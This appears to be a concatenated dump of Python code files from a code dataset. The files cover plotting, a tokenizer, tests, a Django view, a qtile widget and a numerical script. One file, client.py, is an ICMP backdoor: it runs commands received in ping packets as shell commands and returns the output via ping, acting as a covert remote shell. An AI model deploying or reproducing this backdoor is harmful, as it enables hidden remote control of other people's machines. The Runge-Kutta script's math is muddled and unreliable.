True\n\tnumGroups = singVals.shape[0]\n\tnumVals = np.zeros(numGroups, dtype=np.int32)\n\tfor groupIdx in range(numGroups):\n\t\tnumVals[groupIdx] = singVals[groupIdx].shape[0]\n\tassert(np.all(uBound <= numVals))\n\n# if uniform array (only one group, or equally-sized groups), comes as a 2D array\nelse:\n\tnumGroups, numVals = singVals.shape\n\t# pdb.set_trace()\n\tassert(uBound <= numVals)\n\n\nassert(lBound >= 1)\nassert(lBound < uBound)\n\n# calculate energy decay for each group\nfig = plt.figure()\nax = fig.add_subplot(111)\nenergy = np.zeros(uBound - lBound + 1, dtype = np.float64)\nfor groupIdx in range(numGroups):\n\tprint(\"Group \"+str(groupIdx+1))\n\n\tif jagged:\n\t\tsingValsGroup = singVals[groupIdx]\n\telse:\n\t\tsingValsGroup = singVals[groupIdx,:]\n\n\tsumSq = np.sum(np.square(singValsGroup))\n\tfor sIdx in range(lBound-1, uBound):\n\t\tenergy[sIdx] = 100. * (1. - np.sum(np.square(singValsGroup[:(sIdx+1)])) / sumSq)\n\n\t# pdb.set_trace()\n\n\tthresh99 = np.argwhere(energy < 1.0)[0][0] + 1\n\tthresh99p9 = np.argwhere(energy < 0.1)[0][0] + 1\n\tthresh99p99 = np.argwhere(energy < 0.01)[0][0] + 1\n\n\tprint(\"99%: \"+str(thresh99))\n\tprint(\"99.9%: \"+str(thresh99p9))\n\tprint(\"99.99%: \"+str(thresh99p99))\n\n\tax.semilogy(range(lBound,uBound+1), energy)\n\n\tif (groupIdx == 0):\n\t\tminY = np.amin(energy)\n\telse:\n\t\tminY = min(np.amin(energy), minY)\n\nif (minY < 1e-15): minY = 1e-16\n\nax.set_ylim([minY,100])\n\nplt.show()","sub_path":"utils/plotPODEnergyDecay.py","file_name":"plotPODEnergyDecay.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"335732434","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-x86_64/egg/tokenquery/nlp/tokenizer.py\n# Compiled at: 2017-01-30 13:08:47\n# Size of source mod 2**32: 4190 bytes\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom tokenquery.models.token import Token\nfrom nltk.tokenize.regexp import RegexpTokenizer\nfrom nltk.tokenize import WhitespaceTokenizer\n\nclass Tokenizer:\n __doc__ = \"\\n Tokenizer will break text into a list of Token objects.\\n Currently it supports SpaceTokenizer, NLTKWhiteSpaceTokenizer,\\n and PTBTokenizer (default) using NLTK lib. Since NLTK PTBTokenizer\\n does not provide spans for tokens, we have a wrapper\\n over PTB tokenizer to capture start and end of the tokens\\n but is currently in beta mode. please report any potential\\n problems.\\n\\n :param tokenizer_type: type of tokenizer one of 'SpaceTokenizer',\\n 'NLTKWhiteSpaceTokenizer', 'PTBTokenizer'\\n :type tokenizer_type: str\\n \"\n\n def __init__(self, tokenizer_type='PTBTokenizer'):\n if tokenizer_type in ('SpaceTokenizer', 'NLTKWhiteSpaceTokenizer', 'PTBTokenizer'):\n self.tokenizer_type = tokenizer_type\n else:\n print('Unrecognized tokenizer type : setting back to default (PTBTokenizer)')\n self.tokenizer_type = 'PTBTokenizer'\n try:\n nltk.data.find('punkt.zip')\n except LookupError:\n nltk.download('punkt')\n\n def tokenize(self, text):\n \"\"\"\n tokenize text into a list of Token objects\n\n :param text: text to be tokenized (might contains several sentences)\n :type text: str\n :return: List of Token objects\n :rtype: list(Token)\n \"\"\"\n tokens = []\n if self.tokenizer_type == 'SpaceTokenizer':\n operator = RegexpTokenizer('\\\\w+|\\\\$[\\\\d\\\\.]+|\\\\S+')\n for counter, span in enumerate(operator.span_tokenize(text)):\n new_token = Token(counter, text[span[0]:span[1]], span[0], span[1])\n tokens.append(new_token)\n\n else:\n if self.tokenizer_type == 'NLTKWhiteSpaceTokenizer':\n operator = WhitespaceTokenizer()\n for counter, span in enumerate(operator.span_tokenize(text)):\n new_token = Token(counter, text[span[0]:span[1]], span[0], span[1])\n tokens.append(new_token)\n\n elif self.tokenizer_type == 'PTBTokenizer':\n ptb_tokens = word_tokenize(text)\n counter = 0\n for token, span in self._penn_treebank_tokens_with_spans(text, ptb_tokens):\n new_token = Token(counter, token, span[0], span[1])\n counter += 1\n tokens.append(new_token)\n\n return tokens\n\n def _penn_treebank_tokens_with_spans(self, text, tokens):\n text_from_tokens = ''\n for token in tokens:\n norm_token = token.replace('``', '\"').replace(\"''\", '\"').replace('-LRB-', '(').replace('-RRB-', ')').replace('-LSB-', '[').replace('-RSB-', ']').replace('-LCB-', '{').replace('-RCB-', '}')\n text_from_tokens += ' ' + norm_token\n\n text_from_tokens = text_from_tokens.strip().lstrip()\n spans = []\n start_of_span = 0\n t_index = 0\n for t_f_t_index, t_char in enumerate(text_from_tokens):\n if t_char == ' ':\n spans.append((start_of_span, t_index))\n start_of_span = t_index\n continue\n if text[t_index].isspace():\n while text[t_index].isspace() and t_index < len(text):\n t_index += 1\n start_of_span = t_index\n\n if text[t_index] != t_char:\n raise Exception('something went wrong while finding spans for PTB tokens {} does not match {}'.format(text[t_index], t_char))\n else:\n t_index += 1\n\n spans.append((start_of_span, t_index))\n assert len(spans) == len(tokens)\n return zip(tokens, spans)","sub_path":"pycfiles/tokenquery-0.1.1-py3.5/tokenizer.cpython-35.py","file_name":"tokenizer.cpython-35.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"315751444","text":"import os\nimport re\nimport readline\n\n\ng={\n 'local_path':'None',\n 'remote_path':'None',\n 'remote_userid':'None',\n 'remote_password':'None',\n 'project_name':'None',\n 'local_repository':'D:\\\\local\\\\SGitRep\\\\',}\nPROPERTIES =[ k for k in g.keys() ]\nCOMMANDS = ['set', 'get', 'showallproperty', 'commit', 'exit'] \nRE_SPACE = re.compile('.*\\s+$', re.M)\n\nclass Completer(object):\n\n def __init__(self):\n readline.set_completer_delims(' \\t\\n;')\n readline.parse_and_bind(\"tab: complete\")\n readline.parse_and_bind('set editing-mode vi')\n\n def _listdir(self, root):\n \"List directory 'root' appending the path separator to subdirs.\"\n res = []\n for name in os.listdir(root):\n path = os.path.join(root, name)\n if os.path.isdir(path):\n name += os.sep\n res.append(name)\n return res\n\n def _complete_path(self, path=None):\n \"Perform completion of filesystem path.\"\n if not path:\n return self._listdir('.')\n dirname, rest = os.path.split(path)\n tmp = dirname if dirname else '.'\n res = [os.path.join(dirname, p)\n for p in self._listdir(tmp) if p.startswith(rest)]\n # more than one match, or single match which does not exist (typo)\n if len(res) > 1 or not os.path.exists(path):\n return res\n # resolved to a single directory, so return list of files below it\n if os.path.isdir(path):\n return [os.path.join(path, p) for p in self._listdir(path)]\n # exact file match terminates this completion\n return [path + ' ']\n\n def complete_extra(self, args):\n \"Completions for the 'extra' command.\"\n if not args:\n return self._complete_path('.')\n # treat the last arg as a path and complete it\n return self._complete_path(args[-1])\n\n def complete_set(self, args):\n if not args:\n return PROPERTIES\n # treat the last arg as a path and complete it\n lst =[]\n for property in PROPERTIES:\n if property.startswith(args[-1]):\n lst.append(property)\n return lst\n\n def complete_get(self, args):\n if not args:\n return PROPERTIES\n # treat the last arg as a path and complete it\n lst =[]\n for property in PROPERTIES:\n if property.startswith(args[-1]):\n lst.append(property)\n return lst\n\n def complete_exit(self, args):\n return []\n\n def complete_showallproperty(self, args):\n return []\n\n def complete(self, text, state):\n \"Generic readline completion entry point.\"\n buffer = readline.get_line_buffer()\n line = readline.get_line_buffer().split()\n # show all commands\n if not line:\n return [c + ' ' for c in COMMANDS][state]\n # account for last argument ending in a space\n if RE_SPACE.match(buffer):\n line.append('')\n # resolve command to the implementation function\n cmd = line[0].strip()\n if cmd in COMMANDS:\n impl = getattr(self, 'complete_%s' % cmd)\n args = line[1:]\n if args:\n return (impl(args) + [None])[state]\n return [cmd + ' '][state]\n results = [c + ' ' for c in COMMANDS if c.startswith(cmd)] + [None]\n return results[state]\n\n\n \n\ncomp = Completer()\nreadline.set_completer(comp.complete)\n\n\n# print comp._complete_path( path = 'd:\\\\local' )\n# print comp.get_list('d:\\\\local')\nraw_input('Enter section name: ')\n","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"416379257","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nimport threading\nimport time\nimport random\nimport sys\nimport os\nfrom scapy.all import *\nimport subprocess\nimport sendPing\n\nlock = threading.Lock()\n\n#global var shared accross threads\nbuff = []\nprev = [\"\"]\n\ndef mysniff():\n\twhile 1==1:\n\t\t\tpkts = sniff(filter=\"icmp[icmptype] == 8\", count=1)\n\t\t\tif pkts: \n\t\t\t\tfor pckt in pkts:\n\t\t\t\t\tcmd = str(pckt[ICMP][1:]).strip('\\x00')\n\t\t\t\t\tprint(\"received command:\"+cmd)\n\t\t\t\tlock.acquire()\n\t\t\t\ttry:\n\t\t\t\t\tbuff.append(cmd)\n\t\t\t\tfinally:\n\t\t\t\t\tlock.release()\n\t\t\ndef cmdExec(cmd):\n\treturn subprocess.check_output(cmd, shell=True)\n\n\ndef main():\n\tt = threading.Thread(target=mysniff)\n\tt.start()\n\twhile 1==1:\n\t\ttime.sleep(1)\n\t\tif len(buff) != 0 :\n\t\t\t\tif prev[0] != buff[0]:\t\t#is it ping sent out from here?\n\t\t\t\t\tresult = cmdExec(buff[0])\n\t\t\t\t\tprint(result)\n\t\t\t\t\tprint(\"sending ...{0}\".format(result))\n\t\t\t\t\tsendPing.sendP(result)\n\t\t\t\t\tprev[0] = result\n\t\t\t\t\tdel buff[:]\n\t\t\t\telse:\n\t\t\t\t\tdel buff[:] #just delete buff then\n\nif __name__ == '__main__':\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\ttry:\n\t\t\tsys.exit(0)\n\t\texcept SystemExit:\n\t\t\tos._exit(0)\n\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"632567175","text":"import unittest\nfrom scipy import stats\nfrom pyapprox.approximate import *\nfrom pyapprox.benchmarks.benchmarks import setup_benchmark\nimport pyapprox as pya\nclass TestApproximate(unittest.TestCase):\n\n def test_approximate_sparse_grid_default_options(self):\n nvars = 3\n benchmark = setup_benchmark('ishigami',a=7,b=0.1)\n univariate_variables = [stats.uniform(0,1)]*nvars\n approx = approximate(benchmark.fun,univariate_variables,'sparse-grid')\n nsamples = 100\n error = compute_l2_error(\n approx,benchmark.fun,approx.variable_transformation.variable,\n nsamples)\n assert error<1e-12\n\n def test_approximate_sparse_grid_user_options(self):\n nvars = 3\n benchmark = setup_benchmark('ishigami',a=7,b=0.1)\n univariate_variables = [stats.uniform(0,1)]*nvars\n errors = []\n def callback(approx):\n nsamples = 1000\n error = compute_l2_error(\n approx,benchmark.fun,approx.variable_transformation.variable,\n nsamples)\n errors.append(error)\n univariate_quad_rule_info = [\n pya.clenshaw_curtis_in_polynomial_order,\n pya.clenshaw_curtis_rule_growth]\n options = {'univariate_quad_rule_info':univariate_quad_rule_info,\n 'max_nsamples':110,'tol':0,'verbose':False}\n approx = approximate(\n benchmark.fun,univariate_variables,'sparse-grid',callback,options)\n assert np.min(errors)<1e-12\n\n def test_approximate_polynomial_chaos_default_options(self):\n nvars = 3\n benchmark = setup_benchmark('ishigami',a=7,b=0.1)\n univariate_variables = [stats.uniform(0,1)]*nvars\n approx = approximate(\n benchmark.fun,univariate_variables,method='polynomial-chaos')\n nsamples = 100\n error = compute_l2_error(\n approx,benchmark.fun,approx.variable_transformation.variable,\n nsamples)\n assert error<1e-12\n\nif __name__== \"__main__\": \n approximate_test_suite = unittest.TestLoader().loadTestsFromTestCase(\n TestApproximate)\n unittest.TextTestRunner(verbosity=2).run(approximate_test_suite)\n","sub_path":"pyapprox/tests/test_approximate.py","file_name":"test_approximate.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"206650218","text":"import pandas as pd\nimport pytest\nfrom src.data_preprocessing.make_functional_edges_and_weights import EdgeWeightExtractor\nfrom src.utils.miscellaneous import read_exclusions_yaml\n\n\n@pytest.mark.skip(reason=\"Don't run up a big big query bill\")\ndef test_return_data_frame(functional_edges_fixture):\n instance = EdgeWeightExtractor(read_exclusions_yaml(\n \"document_types_excluded_from_the_topic_taxonomy.yml\")['document_types'], \"20190512\", \"20190512\")\n pd.set_option('display.max_colwidth', -1)\n merged = instance.df.merge(functional_edges_fixture,\n on=['source_content_id', 'destination_content_id', 'weight'],\n indicator=True,\n how='outer')\n\n print(merged[merged['_merge'] != 'both'])\n print(merged[merged['_merge'] != 'both'].shape[0])\n assert merged[merged['_merge'] != 'both'].shape[0] == 0\n","sub_path":"tests/unit/data_preprocessing/test_make_functional_edges_and_weights.py","file_name":"test_make_functional_edges_and_weights.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"393432809","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[45]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#Read Accelerometer data (Time, Acceleration)from input file.\nSample1_df = pd.read_csv('Sample1.csv') # saved csv content saved in dataframe \"csv_df\"\n\n# adding prediction column to datafram\nSample1_df['Predicted_Position'] =0\n\n# using abs function to make all values positive\nPos_Sample1_df = Sample1_df.abs()\n\nprint(Pos_Sample1_df.head())\n\n# since our dataset is in dataframe, using dataframe plot function to draw a acceleration graph(DataFrame.plot)\nPos_Sample1_df.plot(x='time_tick',y='acc_X_value')\n\n\n#creating copy of dataframe for working\ndfdata = Pos_Sample1_df\nprint('dataframe shape: ',dfdata.shape)\n\n#printing last few rows\nprint(dfdata.tail())\n\n#find value of y for a given x using step size ha\n#initial values at y0 and x0\ndef rungekutta(x0,y0,x,h,a1,a2):\n #count number of iterations using step size\n #step height h\n n = (int)((x-x0)/h)\n print(\"number of iterations:\",n)\n #iterate for number of iterations\n y = y0\n #for i in range(1,n+1):\n # Apply Runge Kutta formula to find next values of y\n k1 = a1 # t0\n k2 = (y0+h*k1/2)-y0/(x0+h/2)-x0 #slope at y0+h/2 - reference wikipedia runge kutta method\n k3 = (y0+h*k2/2)-y0/(x0+h/2-x0) # y2-y1/x2-x1\n print(\"calculated k3:\",k3)\n k4 = a2\n \n #update next value of y\n y = y + (1/6.0) * (k1 + 2 * k2 + 2 * k3 + k4)\n dfdata.iloc[1,4] = y \n #update the next value of x \n x1 = dfdata.iloc[1,0]\n #==================================================\n y1 = y\n #for i in range(1,n+1):\n # Apply Runge Kutta formula to find next values of y\n \n k1 = (y0+h*k1/2)-y0/(x0+h/2)-x0 #slope at y0+h/2 - reference wikipedia runge kutta method\n k2 = (y0+h*k2/2)-y0/(x0+h/2-x0) # y2-y1/x2-x1\n print(\"calculated k3:\",k3)\n k3= a2\n k4 = dfdata.iloc[2,3]\n print(\"new k4:\",k4)\n #update next value of y\n y2 = y1 + (1/6.0) * (k1 + 2 * k2 + 2 * k3 + k4)\n dfdata.iloc[2,4] = y2 \n \n #update the next value of x \n x2 = dfdata.iloc[2,0]\n print(\"x2 y2:\",x2,y2)\n #=========================================================\n \n #for i in range(1,n+1):\n # Apply Runge Kutta formula to find next values of y\n \n k1 = (y0+h*k2/2)-y0/(x0+h/2-x0) # y2-y1/x2-x1\n print(\"calculated k3:\",k3)\n k2= a2\n k3 = dfdata.iloc[2,3]\n k4 = dfdata.iloc[3,3]\n print(\"new k4:\",k4)\n #update next value of y\n y3 = y2 + (1/6.0) * (k1 + 2 * k2 + 2 * k3 + k4)\n dfdata.iloc[3,4] = y3 \n \n #update the next value of x \n x3 = dfdata.iloc[3,0]\n print(\"x3 y3:\",x3,y3)\n #===============================\n for i in range(4, n+1):\n k1 = dfdata.iloc[i-3,3]\n k2 = dfdata.iloc[i-2,3]\n k3 = dfdata.iloc[i-1,3]\n k4 = dfdata.iloc[i,3]\n y_new = dfdata.iloc[i-1,4] + (1/6.0) * (k1 + 2 * k2 + 2 * k3 + k4)\n dfdata.iloc[i,4] = y_new\n \n return y\n\n#length of the dataframe\ntotal_rows = len(dfdata)\n\n\n#test with single values\nx0 = dfdata.iloc[0,0] #initial timestamp\nprint(\"x0:\", x0)\ny0 = 0 #initial position \nx = dfdata.iloc[total_rows-1,0] # final timestamp\nprint(\"x:\", x)\nh = dfdata.iloc[1,0]-dfdata.iloc[0,0] #step size\nprint(\"h:\", h)\na1 =dfdata.iloc[0,3]\nprint(\"a1:\", a1)\na2 = dfdata.iloc[1,3]\nprint(\"a2:\", a2)\n\n#calling runge-kutta method\ncheck = rungekutta(x0,y0,x,h,a1,a2)\n\n\n\nprint(dfdata)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Runge_test.py","file_name":"Runge_test.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"102113178","text":"# coding: utf-8\n\nimport os,sys\nimport wsgiref.handlers, cgi\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\nfrom ucf.pages.manager.addressbook_share import *\nfrom ucf.tablehelper.addressbook_share import *\n\nfrom ucf.config.ucfconfig import *\nfrom ucf.utils.ucfutil import *\nfrom ucf.utils.ucfxml import *\nfrom ucf.utils.helpers import *\nfrom ucf.utils.validates import *\nfrom ucf.utils.models import *\n\nfrom ucf.gdata.spreadsheet.util import *\n\n############################################################\n## 共有アドレス帳:ページヘルパー\n############################################################\nclass AddressBookSharePageHelper(ManageHelper):\n\n\t_config = None\n\n\tdef __init__(self):\n\t\t# 親のコンストラクタをコール\n\t\tManageHelper.__init__(self)\n\n\tdef onLoad(self):\n\t\tu''' '''\n\t\tparam_file_name = 'manager/addressbook/share/config.xml'\n\t\tparam_file_path = self.getParamFilePath(param_file_name)\n\n\t\tself._config = AddressBookShareConfig(param_file_path)\n\n############################################################\n## バリデーションチェッククラス \n############################################################\nclass AddressBookShareValidator(BaseValidator):\n\tu'''入力チェッククラス'''\n\n\tdef validate(self, helper, vo):\n\t\t\n\t\t# 初期化\n\t\tself.init()\n\n\t\tunique_id = UcfUtil.getHashStr(vo, 'unique_id')\n\n\t\tcheck_name = ''\n\t\tcheck_key = ''\n\t\tcheck_value = ''\n\n\t\tcmd_prefix_length = len(helper._config._cmd_prefix)\n\n\t\tfor k,v in vo.iteritems():\n\t\t\t# AutoCmdを処理\n\t\t\tif k.startswith(helper._config._cmd_prefix) and len(k) > cmd_prefix_length:\n\n\t\t\t\tcmd = v\n\t\t\t\tcheck_key = UcfUtil.subString(k, cmd_prefix_length)\n\t\t\t\tcheck_name = UcfUtil.getHashStr(vo, helper._config._dispname_prefix + check_key)\n\t\t\t\tcheck_value = UcfUtil.getHashStr(vo, check_key)\n\t\n\t\t\t\tself.applicateAutoCmd(check_value, check_key, check_name, cmd)\n\n\t\t#TODO unique_idがスプレッドシート検索に耐えられる値かどうかを判定(先頭数字NG、記号NG、全角数字NG....)\n\n\t\t# 重複チェック\n\t\tif self.total_count == 0:\n\t\t\t# 新規の場合のみチェック(更新時はunique_idは更新させない)\n\t\t\tif self.edit_type == UcfConfig.EDIT_TYPE_NEW:\n\t\t\t\ttable_helper = AddressBookShareTableHelper.createInstance(AddressBookShareTableHelperConfig(helper.getParamFilePath(AddressBookShareTableHelperConfig._config_file_path)))\n\t\t\t\tvo_check = table_helper.getDataByUniqueID(unique_id)\n\t\t\t\tif vo_check != None:\n\t\t\t\t\tself.appendValidate('unique_id', UcfMessage.getMessage(UcfMessage.MSG_VC_ALREADY_EXIST, ()))\n\n############################################################\n## ビューヘルパー\n############################################################\nclass AddressBookShareViewHelper(ViewHelper):\n\n\tdef applicate(self, vo, helper):\n\t\tvoVH = {}\n\n\t\t# ここで表示用変換を必要に応じて行うが、原則Djangoテンプレートのフィルタ機能を使う\n\t\tfor k,v in vo.iteritems():\n\t\t\tvoVH[k] = v\t\n\n\t\treturn voVH\n\n\n############################################################\n## 共有アドレス帳:設定ファイル用クラス\n############################################################\nclass AddressBookShareConfig(UcfConfig):\n#\tPREFIX_SCOND_ORG = 'sk_org_'\n\n\t_cmd_prefix = \"cmd_\"\n\t_dispname_prefix = \"dn_\"\n\n\tCACHEKEY_PREFIX_ADDRESSBOOK_ORG = 'CACHEKEY_PREFIX_ADDRESSBOOK_SHARE_ORG'\n\t_crypto_key = UcfConfig.CRYPTO_KEY\n\n\tMASTERINFO_SPREADSHEET_ACCOUNT = 'Spreadsheet/@account'\n\tMASTERINFO_SPREADSHEET_PASSWORD = 'Spreadsheet/@password'\n\tMASTERINFO_SPREADSHEET_KEY = 'Spreadsheet/@key'\n\tMASTERINFO_WORKSHEET_NAME = 'Spreadsheet/@worksheet_name'\n\tGMAILURL = 'Config/GMailURL'\n\n\t_xmlConfig = None\n\t_config_info = None\n\n\tdef __init__(self, param_file_path):\n\t\tself._xmlConfig\t= self.getConfig(param_file_path)\n\t\tself._config_info = self.exchangeConfigToHash(self._xmlConfig)\n\n\tdef getConfig(self, param_file_path):\n\t\tu''' 設定ファイル取得 '''\n\t\tif os.path.exists(param_file_path):\n\t\t\txmlConfig = UcfXml.load(param_file_path)\n\t\t\treturn xmlConfig\n\t\telse:\n\t\t\treturn None\n\n\tdef exchangeConfigToHash(self, xmlConfig):\n\t\tu''' 設定ファイルの情報をハッシュに変換 '''\n\t\tif xmlConfig != None:\n\t\t\t# ハッシュにして返す\n\t\t\tinfo = xmlConfig.exchangeToHash(isAttr=True, isChild=True)\n\t\t\treturn info\n\t\telse:\n\t\t\treturn None\n\n\tdef getListFields(self):\n\t\tu''' 設定ファイルから一覧表示項目情報を取得 '''\n\t\treturn self._xmlConfig.selectNodes('ListFields/Item')\n\n\tdef getOrgFields(self):\n\t\tu''' 設定ファイルから組織として扱う項目情報を取得 '''\n\t\treturn self._xmlConfig.selectNodes('OrgFields/Item')\n\n\tdef getGMailMailAddressID(self):\n\t\tu''' 設定ファイルからGMAILメールアドレスフィールドを取得 '''\n\t\tresult = ''\n\t\titem = self._xmlConfig.selectSingleNode('GMailFields/MailAddress/Item')\n\t\tif item != None:\n\t\t\tresult = item.getAttribute('id')\n\t\treturn result\n\t\n\tdef getGMailNameIDs(self):\n\t\tu''' 設定ファイルからGMAIL名前フィールド一覧を取得 '''\n\t\tresult = []\n\t\tfor item in self._xmlConfig.selectNodes('GMailFields/Name/Item'):\n\t\t\tresult.append(item.getAttribute('id'))\n\t\treturn result\n\t\n\tdef getGMailMailAddressFields(self):\n\t\tu''' 設定ファイルからGMAILメールアドレス項目情報を取得 '''\n\t\treturn self._xmlConfig.selectNodes('GMailFields/MailAddress/Item')\n\n\tdef getGMailURL(self):\n\t\tu''' 設定ファイルの値を取得:GMAILURL '''\n\t\treturn UcfUtil.getHashStr(self._config_info, self.GMAILURL)\n\n","sub_path":"src/ucf/pages/manager/addressbook_share.py","file_name":"addressbook_share.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"407553106","text":"import pytest\nfrom litleSdkPython.litleOnlineRequest import litleOnlineRequest\n\n\nclass TestToken:\n\n @classmethod\n @pytest.fixture(scope=\"class\", autouse=True)\n def setup(self, config):\n self.config = config\n\n def testSimpleToken(self, register_token_fixture):\n token = register_token_fixture\n token.accountNumber = '1233456789103801'\n litleXml = litleOnlineRequest(self.config)\n response = litleXml.sendRequest(token)\n assert(response.message == \"Account number was successfully registered\")\n\n def testSimpleTokenWithPaypage(self, register_token_fixture):\n token = register_token_fixture\n token.paypageRegistrationId = '1233456789101112'\n litleXml = litleOnlineRequest(self.config)\n response = litleXml.sendRequest(token)\n assert(response.message == \"Account number was successfully registered\")\n\n def testSimpleTokenWithEcheck(\n self, register_token_fixture, echeck_for_token_fixture):\n token = register_token_fixture\n echeck = echeck_for_token_fixture\n token.echeckForToken = echeck\n litleXml = litleOnlineRequest(self.config)\n response = litleXml.sendRequest(token)\n assert(response.message == \"Account number was successfully registered\")\n\n def testSimpleTokenWithApplepay(\n self, register_token_fixture,\n applepay_fixture, applepay_header_fixture):\n token = register_token_fixture\n applepay = applepay_fixture\n header = applepay_header_fixture\n applepay.header = header\n token.applepay = applepay\n litleXml = litleOnlineRequest(self.config)\n response = litleXml.sendRequest(token)\n assert(response.message == \"Account number was successfully registered\")\n assert(response.applepayResponse.transactionAmount == 0)\n\n def testTokenEcheckMissingRequiredField(\n self, register_token_fixture, echeck_for_token_fixture):\n token = register_token_fixture\n echeck = echeck_for_token_fixture\n echeck.accNum = None\n token.echeckForToken = echeck\n\n litle = litleOnlineRequest(self.config)\n with pytest.raises(Exception):\n litle.sendRequest(token)\n\n def testCovertPaypageRegistrationIdIntoToken(self, register_token_fixture):\n tokenRequest = register_token_fixture\n tokenRequest.paypageRegistrationId = \\\n '123456789012345678901324567890abcdefghi'\n\n litleXml = litleOnlineRequest(self.config)\n tokenResponse = litleXml.sendRequest(tokenRequest)\n assert(tokenResponse.litleToken == \"1111222233334444\")\n","sub_path":"litleSdkPythonTestv2/functional/test_token.py","file_name":"test_token.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"130756330","text":"from django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.shortcuts import redirect\nfrom django.template import RequestContext\n\nfrom django import forms\nfrom .models import Film\nfrom haystack.query import SearchQuerySet\n\nclass SearchForm(forms.Form):\n searchBar = forms.CharField(label='Search', max_length=130)\n\n# Create your views here\n\n# home handles GET and POST requests\ndef home(request):\n if request.method == 'POST':\n form = SearchForm(request.POST)\n if form.is_valid():\n search = form['searchBar']\n\n query = SearchQuerySet().filter(\n content=form.cleaned_data['searchBar'])\n\n return render_to_response('maplist/index.html',\n {'form':search, 'results': query},\n context_instance=RequestContext(request))\n search = SearchForm()['searchBar']\n \n # GET request\n return render(request, 'maplist/index.html', {'form': search})\n\nfrom django.http import HttpResponse\nimport json\n\ndef autocomplete(request):\n query = request.GET.get('query', '')\n queryset = SearchQuerySet().autocomplete(text_auto=query)[:5]\n\n # merge film object to single string\n results = []\n for q in queryset:\n results.append(\n q.object.name + ' (' + q.object.year +') @ ' + q.object.location)\n results = {\n 'query': query,\n 'suggestions': results\n }\n\n data = json.dumps(results)\n return HttpResponse(data, 'application/json')\n","sub_path":"maplist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"450718620","text":"import os\nimport cairocffi\n\nfrom . import base\nfrom .. import bar\n\nclass Image(base._Widget, base.MarginMixin):\n \"\"\"\n Display a PNG image on the bar.\n \"\"\"\n defaults = [\n (\"scale\", True, \"Enable/Disable image scaling\"),\n (\"filename\", None, \"PNG Image filename. Can contain '~'\"),\n ]\n\n def __init__(self, width=bar.CALCULATED, **config):\n base._Widget.__init__(self, width, **config)\n self.add_defaults(Image.defaults)\n self.add_defaults(base.MarginMixin.defaults)\n\n # make the default 0 instead\n self._widget_defaults[\"margin\"] = 0\n\n def _configure(self, qtile, bar):\n base._Widget._configure(self, qtile, bar)\n\n if not self.filename:\n raise ValueError(\"Filename not set!\")\n\n self.filename = os.path.expanduser(self.filename)\n\n try:\n self.image = cairocffi.ImageSurface.create_from_png(self.filename)\n except MemoryError:\n raise ValueError(\"The image '%s' doesn't seem to be a valid PNG\"\n % (self.filename))\n\n self.pattern = cairocffi.SurfacePattern(self.image)\n\n self.image_width = self.image.get_width()\n self.image_height = self.image.get_height()\n\n if self.scale:\n new_height = self.bar.height - (self.margin_y * 2)\n\n if new_height and self.image_height != new_height:\n scaler = cairocffi.Matrix()\n sp = self.image_height / float(new_height)\n self.image_height = new_height\n self.image_width = int(self.image_width / sp)\n scaler.scale(sp, sp)\n self.pattern.set_matrix(scaler)\n\n def draw(self):\n self.drawer.clear(self.bar.background)\n self.drawer.ctx.save()\n self.drawer.ctx.translate(self.margin_x, self.margin_y)\n self.drawer.ctx.set_source(self.pattern)\n self.drawer.ctx.paint()\n self.drawer.ctx.restore()\n\n self.drawer.draw(self.offset, self.width)\n\n def calculate_width(self):\n return self.image_width + (self.margin_x * 2)\n","sub_path":"libqtile/widget/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"352590506","text":"def get_payment_link(sum, number, comment):\n\tlink = \"https://qiwi.com/payment/form/99?extra%5B%27account%27%5D={}&amountInteger={}&amountFraction=0&extra%5B%27comment%27%5D={}¤cy=643&blocked[0]=sum&blocked[1]=comment&blocked[2]=account\"\n\tlink = link.format(number, sum, comment)\n\treturn link\n\ndef message_logger(text, username):\n\t# Файл уже создан\n\ttry:\n\t\twith open(\"log.txt\", \"a\", encoding=\"utf-8\") as f:\n\t\t\tf.write(\"{} | @{}\\n\".format(text, username))\n\n\t# Создаём файл\n\texcept:\n\t\twith open(\"log.txt\", \"w\", encoding=\"utf-8\") as f:\n\t\t\tf.write(\"{} | @{}\\n\".format(text, username))\n\n\ndef get_all_users(file=\"base.txt\"):\n\twith open(file, \"r\", 